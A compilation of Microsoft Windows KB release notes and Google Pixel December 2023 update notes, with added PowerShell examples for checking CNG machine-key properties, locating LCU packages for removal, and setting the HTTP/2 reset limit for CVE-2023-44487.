    Microsoft now combines the latest servicing stack update (SSU) for your operating system with the latest cumulative update (LCU). For general information about SSUs, see Servicing stack updates and Servicing Stack Updates (SSU): Frequently Asked Questions.
     
    Install this update
    Release Channel | Available | Next Step
    Windows Update and Microsoft Update | Yes | None. This update will be downloaded and installed automatically from Windows Update.
    Windows Update for Business | Yes | None. This update will be downloaded and installed automatically from Windows Update in accordance with configured policies.
    Microsoft Update Catalog | Yes | To get the standalone package for this update, go to the Microsoft Update Catalog website.
    Windows Server Update Services (WSUS) | Yes | This update will automatically sync with WSUS if you configure Products and Classifications as follows: Product: Microsoft Server operating system-21H2; Classification: Security Updates
    If you want to remove the LCU
    To remove the LCU after installing the combined SSU and LCU package, use the DISM/Remove-Package command line option with the LCU package name as the argument. You can find the package name by using this command: DISM /online /get-packages.
    Running Windows Update Standalone Installer (wusa.exe) with the /uninstall switch on the combined package will not work because the combined package contains the SSU. You cannot remove the SSU from the system after installation.
    File Information
    For a list of the files that are provided in this update, download the file information for cumulative update 5032198. 
    For a list of the files that are provided in the servicing stack update, download the file information for the SSU - version 20348.2084. 
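    The NCryptGetProperty() item above says that, before the fix, asking a machine key for NCRYPT_KEY_TYPE_PROPERTY returned 0x1 instead of 0x20 (the machine-key flag). The following PowerShell is an added example, not part of the KB article or of any Microsoft sample: it creates a throwaway CNG machine key and reads its IsMachineKey property, which .NET implements by querying that same key-type property and testing for the 0x20 flag. The key name is a constructed placeholder, and creating a machine key requires an elevated session.

```powershell
# Added example (not from the KB article): check how a CNG machine key reports
# its key type. CngKey.IsMachineKey is backed by NCryptGetProperty with
# NCRYPT_KEY_TYPE_PROPERTY and tests for NCRYPT_MACHINE_KEY_FLAG (0x20), the
# value the KB item says was coming back as 0x1 before the fix.
using namespace System.Security.Cryptography

function Test-MachineKeyTypeProperty {
    param(
        # Constructed, throwaway key name; the key is deleted again below.
        [string]$KeyName = 'SeedTheNet-Example-MachineKey'
    )
    $params = [CngKeyCreationParameters]::new()
    $params.KeyCreationOptions = [CngKeyCreationOptions]::MachineKey   # system key store, needs elevation
    $params.ExportPolicy       = [CngExportPolicies]::None              # never exportable; this is a probe key only
    $params.Parameters.Add([CngProperty]::new('Length', [BitConverter]::GetBytes(2048), [CngPropertyOptions]::None))

    $key = $null
    try {
        $key = [CngKey]::Create([CngAlgorithm]::Rsa, $KeyName, $params)
        # Fixed build: $true. A build with the bug reports $false because the
        # key-type property lacks the 0x20 machine-key flag.
        [pscustomobject]@{
            KeyName      = $KeyName
            Provider     = $key.Provider.Provider
            IsMachineKey = $key.IsMachineKey
        }
    }
    finally {
        # Remove the probe key from the machine store whatever happened above.
        if ($key) { $key.Delete() }
    }
}

Test-MachineKeyTypeProperty
```

    A result of IsMachineKey = False on a machine key is the symptom described in the release notes; after the update the same probe returns True. The key is created with an export policy of None and deleted in the finally block, so the check leaves nothing behind in the key store.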

    SeedTheNet
    Google Pixel Update - Dec 2023
    Hello Pixel Community,
    We have provided the monthly software update for December 2023. All supported Pixel devices running Android 14 will receive these software updates starting today. The rollout will continue over the next week in phases depending on carrier and device. Users will receive a notification once the OTA is available for their device. We encourage you to check your Android version and update to receive the latest software.
    Details of this month’s security fixes can be found on the Android Security Bulletin: https://source.android.com/security/bulletin
    Thanks, Google Pixel Support Team

    Software versions
    Global
    Pixel 5a (5G): UQ1A.231205.014
    Pixel 6: UQ1A.231205.015
    Pixel 6 Pro: UQ1A.231205.015
    Pixel 6a: UQ1A.231205.015
    Pixel 7: UQ1A.231205.015
    Pixel 7 Pro: UQ1A.231205.015
    Pixel 7a: UQ1A.231205.015
    Pixel Tablet: UQ1A.231205.015
    Pixel Fold: UQ1A.231205.015
    Pixel 8: UQ1A.231205.015
    Pixel 8 Pro: UQ1A.231205.015
    Verizon
    Pixel 7: UQ1A.231205.015.A1
    Pixel 7 Pro: UQ1A.231205.015.A1
    Pixel 7a: UQ1A.231205.015.A1
    Pixel Fold: UQ1A.231205.015.A1
    Pixel 8: UQ1A.231205.015.A1
    Pixel 8 Pro: UQ1A.231205.015.A1

    What’s included
    The December 2023 update includes bug fixes and improvements for Pixel users – see below for details.
    Apps
    General improvements for stability or performance with certain system apps *[1]
    Audio
    Fix for users facing issues in pairing Hearing aid with phone during calls under certain conditions
    Battery & Charging
    General improvements for charging and battery usage *[2]
    Biometrics
    Fix for fingerprint issues on first attempt when always-on display is enabled under certain conditions *[3]
    Bluetooth
    Fix for issue causing Bluetooth discovery to stop functioning under certain conditions
    Fix for issue causing Bluetooth to stop functioning under certain conditions
    Camera
    General improvements for camera stability under certain conditions
    Display & Graphics
    Fix for issue causing emoji icons to be rendered brighter than the rest of the adjacent content *[1]
    Fix for issue causing visual artifacts while scrolling on the home screen under certain conditions *[1]
    Fix for users getting a green flash when using the phone in certain conditions
    General improvements to display stability
    Framework
    General improvements for system stability and performance in certain conditions
    Location & GPS
    Fix for issue causing GPS instability under certain conditions
    Sensors
    Fix for Phone vibrating continuously in certain conditions *[3]
    System
    Fix for issue causing third party apps to crash on start up in certain conditions
    Fix for issue with Battery charging notifications in certain conditions
    Telephony
    Fix for Voice over Wi-Fi calls to fail in certain conditions
    General improvements for network connection stability and performance in certain conditions
    User Interface
    Fix for black bar at the bottom of the display after changing screen saver in certain conditions *[4]
    Fix for black screen in certain conditions *[1]
    Fix for certain users unable to share Videos/Screenshots/Documents in certain conditions *[4]
    Fix for custom clock reset to default in certain conditions
    Fix for email notification overlays that are not removed in certain conditions
    Fix for empty home screen post unlocking via fingerprint in certain conditions
    Fix for home screen blank background post unlocking in certain conditions *[4]
    Fix for incorrect date/time showing in status bar in certain conditions
    Fix for issue causing quick settings tiles to not activate under certain conditions
    Fix for issue causing the clock and temperature to overlap on the At a Glance lockscreen
    Fix for issue with blank notifications in certain conditions
    Fix for messages SMS Icon not showing in certain conditions
    Fix for missing icons post unlocking via fingerprint in certain conditions
    Fix for missing mobile icons in certain conditions when multiple SIMs are used
    Fix for unable to unlock device in certain conditions *[5]
    Fix for Wallpaper on home screen showing black in certain conditions
    Fix for Wi-Fi icon not displaying in certain conditions
    General improvement to the setup wizard flow pertaining to the navigation mode selection *[1]
    General improvements for performance and Memory management in certain UI transitions
    General improvements for performance and stability in certain UI transitions and animations
    General improvements for system stability and performance in certain conditions
    Wi-Fi
    General improvements for Wi-Fi stability and performance in certain conditions

    Device Applicability
    Fixes are available for all supported Pixel devices unless otherwise indicated below.
    *[1] Pixel 8 Pro, Pixel 8
    *[2] Pixel 8 Pro, Pixel 8, Pixel Fold, Pixel Tablet
    *[3] Pixel 6, Pixel 6 Pro, Pixel 6a, Pixel 7, Pixel 7 Pro, Pixel 7a, Pixel Fold, Pixel 8, Pixel 8 Pro
    *[4] Pixel Fold, Pixel Tablet
    *[5] Pixel 6, Pixel 6 Pro, Pixel 6a, Pixel 7, Pixel 7 Pro, Pixel 7a, Pixel 8, Pixel 8 Pro

    SeedTheNet
    October 10, 2023—KB5031361 (OS Build 17763.4974)
    Win 10 Ent LTSC 2019, Win 10 IoT Ent LTSC 2019, Windows 10 IoT Core 2019 LTSC, Windows Server 2019 Release Date:
    10/10/2023
    Version:
    OS Build 17763.4974
    11/17/20
    For information about Windows update terminology, see the article about the types of Windows updates and the monthly quality update types. For an overview of Windows 10, version 1809, see its update history page. 
    Highlights 
    This update supports daylight saving time (DST) changes in Greenland.
    This update addresses security issues for your Windows operating system. 
    Improvements
    This security update includes improvements. When you install this KB: 
    New! This update completes the work to comply with the GB18030-2022 requirements. It removes and remaps characters for Microsoft Wubi input and Microsoft Pinyin U-mode input. You can no longer enter character codepoints that are not supported. All the required codepoints are up to date.
    New! This update adds Azure Arc Optional Component related links to Server Manager. Now, you can turn on Arc on your servers. You do not need to run a PowerShell script.
    This update changes the spelling of Ukraine's capital from Kiev to Kyiv.
    This update addresses an issue that affects scheduled tasks. Tasks that call the credential manager API might fail. This occurs if you select [Run only when user is logged on] and [Run with highest privileges].
    This update addresses an issue that stops you from getting the IE mode windows list.
    This update addresses an issue that affects external binding. It fails. This occurs after you install Windows updates dated May 2023 or later. Because of this, there are issues that affect LDAP queries and authentication.
    This update addresses an issue that affects those who enable the “Smart Card is Required for Interactive Logon” account option. When RC4 is disabled, you cannot authenticate to Remote Desktop Services farms. The error message is, "An authentication error has occurred. The requested encryption type is not supported by the KDC.”
    This update addresses an issue that affects Kerberos delegation. It might fail in the wrong way. The error code is 0xC000006E (STATUS_ACCOUNT_RESTRICTION). This issue might occur when you mark the intermediate service account as “This account is sensitive and cannot be delegated” in Active Directory. Applications might also return the error message, “System.Security.Authentication.AuthenticationException: Failed to initialize security context. Error code was -2146893042.”
    This update affects Windows Filtering Platform (WFP) connections. The redirect diagnostics for them has improved.
    This update addresses an issue that affects a relying party. When you sign out of it, a SAML request cookie is not cleared. Because of this, your device automatically attempts to connect to the same relying party when you sign in again.
    This update addresses an issue that affects the Server Message Block (SMB) client. It does not reconnect all the persistent handles when the reauthentication of a session fails.
    To protect against CVE-2023-44487, you should install the latest Windows update. Based on your use case, you can also set the limit of the RST_STREAMS per minute using the new registry key in this update.
    Registry key: Http2MaxClientResetsPerMinute
    Default value: 500
    Valid value range: 0–65535
    Registry key function: Sets the allowed number of resets (RST_STREAMS) per minute for a connection. When you reach this limit, the connection ends.
    If you installed earlier updates, only the new updates contained in this package will be downloaded and installed on your device.
    For more information about security vulnerabilities, please refer to the new Security Update Guide website and the October 2023 Security Updates.
    Windows 10 servicing stack update - 17763.4965
    This update makes quality improvements to the servicing stack, which is the component that installs Windows updates. Servicing stack updates (SSU) ensure that you have a robust and reliable servicing stack so that your devices can receive and install Microsoft updates. 
    Known issues in this update
    Symptom: Using the FixedDrivesEncryptionType or SystemDrivesEncryptionType policy settings in the BitLocker configuration service provider (CSP) node in mobile device management (MDM) apps might incorrectly show a 65000 error in the "Require Device Encryption" setting for some devices in your environment. Affected environments are those with the “Enforce drive encryption type on operating system drives” or "Enforce drive encryption on fixed drives" policies set to enabled and selecting either "full encryption" or "used space only". Microsoft Intune is affected by this issue but third-party MDMs might also be affected.
    Important: This issue is a reporting issue only and does not affect drive encryption or the reporting of other issues on the device, including other BitLocker issues.
    Workaround: To mitigate this issue in Microsoft Intune, you can set the “Enforce drive encryption type on operating system drives” or "Enforce drive encryption on fixed drives" policies to not configured.
    We are working on a resolution and will provide an update in an upcoming release.
    How to get this update
    Before installing this update
    Microsoft now combines the latest servicing stack update (SSU) for your operating system with the latest cumulative update (LCU). SSUs improve the reliability of the update process to mitigate potential issues while installing the LCU. For general information about SSUs, see Servicing stack updates and Servicing Stack Updates (SSU): Frequently Asked Questions. 
    Prerequisite:
    You must install the August 10, 2021 SSU (KB5005112) before installing the LCU. 
     
    Install this update
    Release Channel | Available | Next Step
    Windows Update and Microsoft Update | Yes | None. This update will be downloaded and installed automatically from Windows Update.
    Windows Update for Business | Yes | None. This update will be downloaded and installed automatically from Windows Update in accordance with configured policies.
    Microsoft Update Catalog | Yes | To get the standalone package for this update, go to the Microsoft Update Catalog website.
    Windows Server Update Services (WSUS) | Yes | This update will automatically sync with WSUS if you configure Products and Classifications as follows: Product: Windows 10; Classification: Security Updates
    If you want to remove the LCU
    To remove the LCU after installing the combined SSU and LCU package, use the DISM/Remove-Package command line option with the LCU package name as the argument. You can find the package name by using this command: DISM /online /get-packages.
    Running Windows Update Standalone Installer (wusa.exe) with the /uninstall switch on the combined package will not work because the combined package contains the SSU. You cannot remove the SSU from the system after installation.
    File information
    For a list of the files that are provided in this update, download the file information for cumulative update 5031361.
    For a list of the files that are provided in the servicing stack update, download the file information for the SSU - version 17763.4965. 
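    The "If you want to remove the LCU" steps in the posts above (find the package name with DISM /online /get-packages, then remove it with DISM /Remove-Package, because wusa.exe /uninstall cannot split the SSU out of the combined package) can be scripted. The following PowerShell is an added example, not part of the KB articles: it uses the DISM module's Get-WindowsPackage cmdlet instead of parsing DISM's text output, filters for the cumulative-update package (these install under the Package_for_RollupFix name), and prints the exact removal command without running it. The build number passed in is the one from the post title; treating Package_for_RollupFix as the LCU package family is the one assumption the KB text does not state.

```powershell
# Added example (not from the KB article): locate the installed LCU package
# and build the DISM /Remove-Package command line the KB describes.
# Run in an elevated session; Get-WindowsPackage -Online needs it.

function Get-LcuPackage {
    param(
        # OS build from the post title, e.g. '17763.4974'. Empty = list all LCUs.
        [string]$BuildNumber
    )
    # Assumption: cumulative updates install as Package_for_RollupFix~...~<build>.x.y.
    # The SSU carried by the combined package is a separate package and, as the
    # KB states, cannot be removed once installed, so it is not matched here.
    Get-WindowsPackage -Online |
        Where-Object { $_.PackageName -like 'Package_for_RollupFix~*' -and $_.PackageState -eq 'Installed' } |
        Where-Object { [string]::IsNullOrEmpty($BuildNumber) -or $_.PackageName -like "*~$BuildNumber.*" } |
        Sort-Object InstallTime -Descending
}

function Get-LcuRemovalCommand {
    param([Parameter(Mandatory)] $Package)
    # Exactly the form the KB describes; /quiet and /norestart are optional extras.
    "DISM /online /Remove-Package /PackageName:$($Package.PackageName)"
}

# Usage: show what is installed and the command that would remove it.
# Note that 'wusa.exe /uninstall /kb:<number>' does not work on the combined
# SSU+LCU package, which is why the DISM form is needed.
$lcu = @(Get-LcuPackage -BuildNumber '17763.4974')
if ($lcu.Count -eq 0) {
    Write-Host 'No installed LCU package matches that build.'
} else {
    $lcu | Select-Object PackageName, InstallTime | Format-List
    Write-Host 'To remove the most recent match, run (elevated):'
    Write-Host (Get-LcuRemovalCommand -Package $lcu[0])
}
```

    Printing the command rather than executing it keeps the rollback a deliberate second step: removing an LCU also removes its security fixes, so the usual pattern is to confirm the package name first and run the DISM line only as part of a planned rollback.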

    SeedTheNet
    October 10, 2023—KB5031362 (OS Build 14393.6351)
    Windows 10, version 1607, all editions Windows Server 2016, all editions Release Date:
    10/10/2023
    Version:
    OS Build 14393.6351
    11/19/20
    For information about Windows update terminology, see the article about the types of Windows updates and the monthly quality update types. For an overview of  Windows 10, version 1607, see its update history page.  
    Highlights
    This update supports daylight saving time (DST) changes in Greenland.
    This update addresses security issues for your Windows operating system. 
    Improvements
    This security update includes quality improvements. When you install this KB: 
    New! IE mode and Microsoft Edge can now share cookies. To learn more, see Cookie sharing between Microsoft Edge and Internet Explorer.
    New! This update completes the work to comply with the GB18030-2022 requirements. It removes and remaps characters for Microsoft Wubi input and Microsoft Pinyin U-mode input. You can no longer enter character codepoints that are not supported. All the required codepoints are up to date.
    This update changes the spelling of Ukraine's capital from Kiev to Kyiv.
    This update addresses an issue that affects external binding. It fails. This occurs after you install Windows updates dated May 2023 or later. Because of this, there are issues that affect LDAP queries and authentication.
    To protect against CVE-2023-44487, you should install the latest Windows update. Based on your use case, you can also set the limit of the RST_STREAMS per minute using the new registry key in this update.
    Registry key: Http2MaxClientResetsPerMinute
    Default value: 500
    Valid value range: 0–65535
    Registry key function: Sets the allowed number of resets (RST_STREAMS) per minute for a connection. When you reach this limit, the connection ends.
    If you installed earlier updates, only the new updates contained in this package will be downloaded and installed on your device.  
    For more information about security vulnerabilities, please refer to the new Security Update Guide website and the October 2023 Security Updates.
    Known issues in this update
    Microsoft is not currently aware of any issues with this update.
    How to get this update
    Before installing this update
    Microsoft strongly recommends you install the latest servicing stack update (SSU) for your operating system before installing the latest cumulative update (LCU). SSUs improve the reliability of the update process to mitigate potential issues while installing the LCU and applying Microsoft security updates. For general information about SSUs, see Servicing stack updates and Servicing Stack Updates (SSU): Frequently Asked Questions. 
    If you are using Windows Update, the latest SSU (KB5031467) will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the Microsoft Update Catalog. 
    Install this update
    Release Channel | Available | Next Step
    Windows Update and Microsoft Update | Yes | None. This update will be downloaded and installed automatically from Windows Update.
    Windows Update for Business | Yes | None. This update will be downloaded and installed automatically from Windows Update in accordance with configured policies.
    Microsoft Update Catalog | Yes | To get the standalone package for this update, go to the Microsoft Update Catalog website.
    Windows Server Update Services (WSUS) | Yes | This update will automatically sync with WSUS if you configure Products and Classifications as follows: Product: Windows 10; Classification: Security Updates
    File information
    For a list of the files that are provided in this update, download the file information for cumulative update 5031362.
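    Both October posts above describe the Http2MaxClientResetsPerMinute registry value added for CVE-2023-44487 (default 500, valid range 0–65535, connection closed once the limit is reached) without giving its location. The following PowerShell is an added example, not part of the KB articles: it reads the current limit, reports whether the documented default is in effect, and sets a new value with the KB's range enforced. The HTTP.sys parameters path used below is an assumption on my part, not something the posts state; confirm it against the Microsoft guidance for this CVE before relying on it.

```powershell
# Added example (not from the KB article): inspect or set the HTTP/2
# RST_STREAM rate limit described in the release notes.
# Assumption: the value is a REG_DWORD under the HTTP.sys service parameters key.
$HttpParams = 'HKLM:\SYSTEM\CurrentControlSet\Services\HTTP\Parameters'
$ValueName  = 'Http2MaxClientResetsPerMinute'

function Get-Http2ResetLimit {
    # Returns the effective limit: the registry value if present, otherwise the
    # documented default of 500, and says which one applies.
    $item = Get-ItemProperty -Path $HttpParams -Name $ValueName -ErrorAction SilentlyContinue
    if ($null -eq $item) {
        [pscustomobject]@{ Limit = 500;                   Source = 'default (value not set)' }
    } else {
        [pscustomobject]@{ Limit = [int]$item.$ValueName; Source = 'registry' }
    }
}

function Set-Http2ResetLimit {
    param(
        [Parameter(Mandatory)]
        [ValidateRange(0, 65535)]   # valid range from the KB table
        [int]$Limit
    )
    if (-not (Test-Path $HttpParams)) {
        throw "HTTP.sys parameters key not found at $HttpParams"
    }
    New-ItemProperty -Path $HttpParams -Name $ValueName -PropertyType DWord -Value $Limit -Force | Out-Null
    # HTTP.sys reads its parameters when the driver starts, so the new limit
    # applies after a reboot (or after restarting the HTTP service and everything
    # that depends on it, such as IIS).
    Write-Warning "Set $ValueName to $Limit; reboot for HTTP.sys to pick up the new limit."
}

# Usage (elevated session):
Get-Http2ResetLimit | Format-List
# Set-Http2ResetLimit -Limit 200     # tighten the per-minute reset budget
# Set-Http2ResetLimit -Limit 70000   # rejected by ValidateRange before touching the registry
```

    A lower limit ends abusive connections sooner but also affects legitimate clients that reset many streams; the KB's advice to choose the value "based on your use case" applies, and the default of 500 is the value to compare against when auditing a fleet.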
